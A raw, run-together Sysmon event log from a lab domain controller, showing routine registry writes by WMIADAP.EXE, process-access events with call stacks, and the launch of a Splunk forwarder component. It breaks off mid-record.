13241300x80000000000000008097Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:17.805{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x000063ca) 13241300x80000000000000008096Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:17.711{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 13241300x80000000000000008095Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:17.711{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\PerfIniFileWmiApRpl.ini 12241200x80000000000000008094Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-12-08 13:57:17.711{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 12241200x80000000000000008093Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-12-08 13:57:17.711{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List 12241200x80000000000000008092Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-12-08 13:57:17.711{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last Help 12241200x80000000000000008091Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-12-08 13:57:17.711{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First Help 12241200x80000000000000008090Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-12-08 13:57:17.711{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last Counter 12241200x80000000000000008089Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-12-08 13:57:17.711{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First Counter 13241300x80000000000000008088Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:17.711{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x00006323) 13241300x80000000000000008087Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:17.711{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x00006322) 13241300x80000000000000008086Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:17.695{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 13241300x80000000000000008117Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001) 13241300x80000000000000008116Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000) 13241300x80000000000000008115Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\xeniface.sys[XENIFACEMOF]LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully 13241300x80000000000000008114Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\intelppm.sys.mui[PROCESSORWMI]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000008113Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\intelppm.sys[PROCESSORWMI]LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully 13241300x80000000000000008112Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\mssmbios.sys.mui[MofResource]LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000008111Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\mssmbios.sys[MofResource]LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully 13241300x80000000000000008110Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\ACPI.sys.mui[ACPIMOFResource]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000008109Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\ACPI.sys[ACPIMOFResource]LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully 13241300x80000000000000008108Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\en-US\kernelbase.dll.mui[MofResourceName]LowDateTime:1470350432,HighDateTime:30846383***Binary mof compiled successfully 13241300x80000000000000008107Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\kernelbase.dll[MofResourceName]LowDateTime:-1965991328,HighDateTime:30841156***Binary mof compiled successfully 12241200x80000000000000008106Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashDeleteKey2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE 13241300x80000000000000008105Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:20.351{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance DataBinary Data 10341000x80000000000000008143Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.891{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-866A-5FCF-6401-000000009101}3436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008142Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.891{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008141Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.891{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008140Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.891{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008139Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.891{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008138Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.891{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008137Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.891{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008136Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.891{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008135Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.891{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008134Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.891{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008133Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.891{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-866A-5FCF-6401-000000009101}3436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008132Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.891{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-866A-5FCF-6401-000000009101}3436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008131Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.892{10ACEC4A-866A-5FCF-6401-000000009101}3436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008130Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.219{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-866A-5FCF-6301-000000009101}4224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008129Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.219{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008128Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.219{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008127Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:02.219{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008126Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 